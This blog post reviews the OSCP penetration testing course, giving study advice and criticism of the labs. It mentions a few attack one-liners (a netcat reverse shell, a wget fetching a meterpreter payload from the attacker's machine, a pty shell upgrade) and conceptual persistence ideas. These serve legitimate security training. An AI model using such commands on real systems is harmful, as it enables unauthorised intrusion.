Offensive Security Certified Professional Part 2

Where the course was great, and where it wasn't

23 April 2016

This is the second in a series of posts about the OSCP certification and my journey to acquire it. This post is a post-graduate viewpoint offering some commentary on various things and some constructive criticism of the course. If you don’t know about the course, please have a look at part 1

Reading about the PWK course, if you’re like me, was an intimidating experience. I have the habit of always shortchanging myself when comparing what I know and can do against what I think others can do. It was exciting, but it was also “can I really do all this?”

Now that I have the certificate framed in my office, obviously the answer was “yes.” But it would have bolstered my courage a little to read some criticism of the course, to know that it is defeatable.

I genuinely believe Offensive Security is publishing the best program they can, and their numerous other works and contributions to the field of information security can’t be understated. Without Kali Linux, we’d have a less organized field of probably lesser alternatives. Without exploit-db.com we would have to range all over a smattering of github pages, blog posts, CVE references and FSM-knows what else to find proof of concept exploit code. I think the google hacking database is overshadowed by sh0dan, but it is nonetheless a great resource.

All that said, the course has some bad points. I don’t claim to have the answers to those points, but I’ll note what I think could be improved and how.

I’m also going to address some of the weirder “tribal wisdom” I’ve seen in posts, IRC, etc. These are differences in opinion, and again aren’t counter-assertions intended to tell people they’re wrong.

30 days is probably not a great idea or “how to make your wife very angry with you”

I’ve seen a couple of people in the IRC #offsec channel over time talk about using the 30 day option for the course enrollment. Sometimes it’s a matter of scheduling, sometimes it’s a matter of hubris, sometimes it’s a matter of just not understanding how brutal this course can be to your free time and relationships. I’ve read some pretty sad things about students and their significant others’ strain in various places.

One gentleman in particular, who goes by ‘unfo-‘ in the #offsec channel, was open enough about his experience with the PWK course to post a series of Youtube videos and words about his progression on a 30 day schedule. The culmination of that experience, unfortunately, was a failure on his first OSCP exam attempt.

I myself “gambled” against my nature in a way, and went for the 60 day option when part of me thought conservatively that I should do the 90 days. Looking back, I probably would have breached all the machine given 90 days time, as I was only about 8-9 off the mark as it was with about 25 days spent completely on lab work. However, your likelihood of passing the exam is not really tied in a strong way to your “kill count” in the lab. As OffSec themselves say in a forum FAQ entry

Do I need to get every machine in the lab todo the exam?

No. The machines in the lab are there to give you as much experience as possible before you take the exam in order to better to prepare you.

My suggestion is this: Take as long as you think you’ll need to understand the material in the syllabus. In fact, if your schedule allows it, study ahead of time the things that you don’t know. It’s what I did. The exam really does emphasize the course material, not the lab machines.

I feel bad for folks who have to do this out of scheduling conflicts or other concerns that prevent them from having a strong chance of passing the exam. I wonder what the purpose of the 30 day option even is. My best guess is that it allows already seasoned industry vets to pick up the cert with a minimum of time investment.

On the other hand, might that not be better served by simply allowing anyone to take the exam? The OSCE course, cracking the perimeter actually has a pre-test to screen out folks who aren’t ready for it, and I think something like that could be implemented for OSCP. Pass a screening exam, and allow one take without first completing PWK. Fail that one test, and force them to take the course normally.

And on a more personal note, try not to do this course while your wife is pregnant. Or worse, with a newborn! I’ve lost count of how many times I’ve read “my wife was 9 months along when I scheduled my exam.” Seriously? I know everyone has their own circumstances, but goodness if you aren’t making things even harder on yourself by making this choice.

“Don’t rely on MSF”

So, there’s a strong sentiment I see frequently. It goes “I can’t use the metasploit framework (MSF) on the exam, so I’m not going to rely on it!” The implication being that the student will implement a lot of new old wheels instead of leveraging existing quality, polished tools.

This confuses me, and I wanted to talk about it.

First, some explanation for those who don’t know, the MSF has a couple of different contexts because it is both a tool and a repository of exploit code and modules. This distinction is important.

OffSec restricts the modules you may use on the exam. Basically, they want you to prove you know the material by going through the motions of more “manual” exploitation and (more importantly) privilege escalation. The MSF makes certain tasks very very easy. ‘Too easy’ for the context of an exam. Hence the restrictions.

However, the MSF is also a tool, and it enormously improves the quality of life of the penetration tester when working with a remote compromised system. The msfvenom and meterpreter binaries in particular are things you should be very familiar and comfortable with. Spawning remote shells from inside a meterpreter session is so valuable that I can’t overstate it enough. Using the portfwd command is crucial on several lab hosts to gain full privileges. Lateral movement in Windows domains is much improved with post modules. Workspaces keep your sessions, loot and artifacts organized.

And out in the real world, working with other penetration testers, there aren’t (usually) restrictions on what you may do. The full breadth of the framework is at your disposal. If you graduate from the course without a solid mastery of MSF, you have really shortchanged yourself.

One more thing of note.

I realize that nc/socat/ncat are used frequently in the course guide when doing elementary remote connections to hosts. nc -e /bin/bash is a real thing. However, my experience and habit working in the lab was that if there was a possibility of removing nc from the killchain, I took it every time. Usually with a meterpreter binary. But I’ve noticed a sort of predisposition to continue to use nc as a interlocutor for shells when it’s not usually required or even beneficial.

Sure, an exploit might have a nc -lp listener as the usual catcher, but in those cases the first thing I did was

wget http://<my_kali_IP/meterpeter.bin

or some variant.

Okay. That’s a lie. The first thing I did was swear at sh and

python -c 'import pty; pty.spawn("/bin/bash")'

Try Harder, but process counts too

If you ask for help in #offsec or on the forums, you’re asking in the wrong place first of all. But if you do, you’ll likely hear a riff on ‘try harder.’

I have more ideas about balancing ‘try harder’ with learning below, but here’s the real deal.

I would say that my lab experience with trying harder was a result of either not enumerating the right ‘clue’ to move forward, or encountering something that I didn’t know was possible.

For example, did you know that .cgi files contain arbitrary scripts? Bash? Check. Perl? Check. Python? Check.

Well, I didn’t know. And it caused me no end of grief on one linux host in the lab. That box cost me more time than ‘pain’ did, by far. It wasn’t until I was researching how the relevant application worked that I discovered this fact. Once I knew, it was easy to move forward.

So simple ignorance kept me out of some boxen for a long time. Usually the culprit was simple under-enumeration though. nmap is what folks tend to think of, but nikto, dirbuster, onesixtyone, enum4linux and others provide individual pieces of information that in aggregate unlock hosts. Paying attention to details and learning what matters and what doesn’t is basically the entire point of the lab. Sure, there’s learning proxychains and some bespoke tools, but none of that matters if you can’t enumerate your environment accurately, quickly and comprehensively.

In other words, Process. Process gets you root.

Try Harder is good and all, but you need to try harder where it counts, your ignorance. That’s my take away. If you just try slam your head harder into a problem, you waste time, brain power and stamina. Be aware, be picky.

Despair

Oh man.

The first week of my lab time, I sucked. Bad

I had a lot of pressures on me during the course. I had a daytime gig that fortunately was very flexible about my work “shifts” and so that wasn’t too bad. But launching 0meta Security as a whole, the people, the knowledge, the investment, hinged upon me acquiring my OSCP. It is both enabler and fallback plan. Multiple individuals had time and investment tied up in the company. I basically couldn’t afford to fail the course.

I didn’t really have any troubles moving through the PDF, and once I got to the end I was feeling pretty good!

And then other than a couple of essentially freebie hosts, I couldn’t pop anything.

I made a mistake that OffSec warns you about, which is

Don’t go in order of IPs when moving through the lab. Go for the lowest-hanging fruit first, then move on to more difficult hosts.

Naturally, with my inflated sense of ego, I ignored that sage advice and…“had a bad time”, as they say on the interwebz.

I felt not only worthless, but also that my enormous investment in skills over the past 2 years was basically for naught. I was a pretty miserable person to be around too. I was in a very depressed state and lashed out at myself verbally in an immature manner.

I’m being frank here because I feel that it’s important. I didn’t give up (not that I felt I could, but still), and I kept at it until I started ‘getting it.’ I can remember the box I was working on when I had my first real success at rooting a host where I knew nothing about the application I was attacking beforehand. From ground floor to the top, by research and experimentation.

Yeah, it felt good, but that wasn’t really the point. The progress on process was what mattered. Truly understanding the cycle of enumeration and testing/research is what propelled me forward through the rest of the lab time.

But the despair was real.

Day 1 labs

No. Don’t. Just don’t.

There are a couple of exceptions I guess. If you really are already employed as a penetration tester, I guess you can just jump in and start rooting.

If you aren’t though, if you’re starting from square one, please don’t. I read all the time about students getting discouraged (like I did above) and they’ll be asked about how much of the PDF they’ve read and exercises they’ve completed.

A few chapters…

No, you’re getting ahead of yourself. Let me phrase it this way:

If jumping straight into the labs was the best way to go forward, there probably wouldn’t be a PDF, and OffSec would outright recommend it.

Notably, they don’t do this. They created the course as a sum of all the parts, not just a jumble of virtual hosts and a few networks strung together. If that’s all you wanted there are alternatives that are free.

Automate all the things!…not!

A couple of other reviews of OSCP and PWK recommend that students automate the enumeration cycle to the furthest extent they can.

I do not do this, though I won’t go so far as to condemn it. I want to assert that it isn’t required in the least to do well in the labs or pass the exam. In actual engagements, excessive automation can be a liability.

Remember, PWK teaches penetration testing, the purpose of which is to test. With real systems, real networks, no reverts, IDS, honeypots, packet-inspecting firewalls.

There’s no point in running onesixtyone in a script with nmap when there were no SNMP services running on any hosts. If your automation accounts for that, good job! Otherwise, you just wasted time. And made more noise on the network. And cluttered up your log output.

My process for enumeration starts with one tool, and moves to the next only based on the results of the tool I just ran. I choose to send every packet out of my interface. Not a blizzard of

nmap -sS -A -p- -Pn -T5 <some poor sap's IP>

What is just killer is if you kick off some grand scan of the universe, but you typo’d something and now you’re scanning out of scope. Especially if your grand scan uses nmap’s scripting engine. And you’re like, hey, let’s turn on unsafe scripts because otherwise I can’t get smb-check-vulns to return real results!

Bad move. Bad day.

The ‘rabbit hole’ misconception

I spent too long/5 hours/a day on a rabbit hole. Ugh

Rabbit hole carries a negative connotation of “I wasted time on something that doesn’t matter.” I certainly understand the feeling.

Remember though, rabbit holes aren’t always negative! If you didn’t follow good process then yeah, it was probably bad. On the other hand, I learned about the veil framework by going down a rabbit hole on a host, because some of the information on it suggested that antivirus evasion would play a role in getting exploits to execute. If you traversed a rabbit tunnel, even if it did end up bottoming out, try to keep track of what you learned getting to the end. And more importantly, how to avoid that hole in the future!

Criticisms

Proof files are useless, give them meaning

This is a tangled subject, because it has to do with how people learn, how the course is architected, and OffSec’s goals and principles.

Research is important, incredibly so in the information security space. You’ll never know everything, you’ll never be great at all of it, it moves very quickly, etc. We’ve all heard it before. Instilling in students the pivotal understanding that ‘discovering answers on your own’ is the basic assumption in infosec, is OffSec’s job. At least, if you want to be like Dan, or HD, or Mikko.

At some point though, you have to teach. You have to teach the error in process that leads to a student banging their head and not getting anywhere. This is a lab, and it’s literally the only environment where these people can learn process.

As a result of pressure or frustration, students ask for help in IRC, or out of channel, and they get help in ways that don’t help them. You’re supposed to ask admins for help, because they are the best at giving hints that don’t spoil the host or challenge. However, out of the spirit of camaraderie, students will invariably cooperate out of sight of administrators. There needs to be a more formalized system to address this.

“But! Out in the real world, there aren’t hints and help files!”

That is correct, of course. It’s also facile because in the real world, you have mentors and peers. If you don’t know what to do, you almost certainly will be working in an environment where you can turn to your peer and ask “hey, have you seen this before?”

Recognition of this is important. Penetration tests at the highest levels are team efforts. Exactly because no one is great at everything. I’m personally bad at webapps and great at privilege escalation. You’re probably different. We all have strengths and weaknesses.

To get better, to meet what you might think of as an “acceptable minimum” though, you really need to get your process refined.

I look at the proof.txt files from the labs as wasted potential. They’re treated as trophies currently. You include them in a report that you don’t actually have to submit. Students get hung up on them with questions like:

“I can read this proof.txt even though I don’t have a shell. Am I done with the box?”

The newest exam setup actually uses proof.txt files from exam hosts during submission of results, directly in a control panel, which wasn’t the case during my exam. Other than that…nothing. Waste.

I think we can solve three problems with one stone here, by allowing hints to lab hosts to be “dispensed” from a system in the control panel in return for proof.txt files.

The particulars, like the nature of the hints (do we give the whole solution, the first “step?” Something in between?), how much the hints “cost,” whether certain hosts are “hintable” or not and so on, are just details. The point is that as students legitimately breach hosts and refine their process, they acquire the ability to get fixed, narrow help only where needed, and only in return for ‘trying harder.’ They can see where they’re missing enumeration, or where they didn’t research a service or application enough. Where their privilege escalation script is letting them down. Good students will take advantage of a system like this to enhance their process.

This also gives students “plenty of rope to hang themselves with,” as the saying goes. Meaning, if they cheat and harvest hashes from other sources, they are actively making the choice to sabotage their learning, and it isn’t OffSec’s problem if they don’t pass the exam.

It’s my sincere belief that a system like this would do a lot of good, if handled properly. I hope it comes to pass, as it will make the course even better.

Practicing persistence

The edgiest moment I have right after firing an exploit is waiting for the scripted meterpreter commands to find a stable home for my meterpreter process.

The second edgiest moment is establishing persistence.

Working with persistence is really important in penetration testing. Machines get rebooted, employees turn their workstations off, or laptops go to sleep, etc. You may not have a long time to figure out what situation you’re in. Making sure you can re-establish your connection is the first thing you should be doing in nearly all cases.

In the lab, this is essentially impossible to experiment with, since a VM can be reverted at any moment. Sure, you can use the Win7 host you get access to for the course to practice Windows persistence. However, the VM also has an auto-shutoff function that is easy to accidentally turn into a full revert of the host if you aren’t careful. Obviously this doesn’t help you with Linux, FreeBSD, or OS X either.

I think at the least, the course PDF should include much more information on persistence. The Metasploit Unleashed book contains a section on persistence, but only in the context of the meterpreter service, which is generally undesirable as a foothold because it writes a binary to disk. Going over advanced persistence avenues like registry-embedded scripts (which aren’t binaries and typically don’t trigger AV), powershell scripts (again, not binaries), or attacking firmware to embed services would be really nice additions.

As it is, using the lab I’ll talk about in part 3, I had to figure out this stuff on my own afterwards.

Post-graduate Services

I think most alumni would agree that the lab access is what we “miss” about the course. It’s well-curated and extensive.

In the “post-graduate services” category, I’d pay a smallish yearly fee in order to have access to “beta testing” new lab machines, or to help refine course materials in general. I think it would be a cool way to involve OSCP holders. OffSec doesn’t require continuing education credits to maintain an OSCP or OSCE, (which is the right move, btw), but it would be a neat way to maintain the relationship between the organization and the certification holders, while generating income that could be recycled back into the course.

Put Retired Lab Machines on Vulnhub

If you weren’t aware, vulnhub is a repository of so-called “boot2root” virtual machines. Pop them into VirtualBox, and attack it just like a lab machine. They vary in difficulty, from say…‘kraken’ to probably Humble or worse.

Some teach specific techniques, like webapps, using password bruteforcers, evading IDS counter-measures, etc. Others are just ‘follow the breadcrumbs’ like a fair number of OffSec lab machines are.

I think it would be really neat for OffSec to publish old/retired lab hosts as packages on vulnhub. Let these hosts continue to educate even when they aren’t cutting edge or super-relevant anymore for the course itself.

Not Enough Active Directory Shenanigans

There are only a very small number of computers in the lab that actually matter for working with Active Directory. Breaching them is a matter of pivoting and enumeration techniques that you may only begin when you find and attack the right ‘first’ host.

I was hoping for more in this vein. In my opinion, it would be best to have a whole “network” dedicated to working with AD, and using various skills to exploit SMB, authentication, Kerberos Golden Tickets, etc. It’s so important for penetration testers to have a solid grasp of these skills that I’m surprised more time isn’t devoted to talking about them.

That wraps up the second part in this series. Part 3 will talk about helpful techniques, tools, and procedures to make youre time in the lab, and afterward, more enjoyable.

Thanks for reading.


by:
0meta Staff

(blog@0metasecurity.com)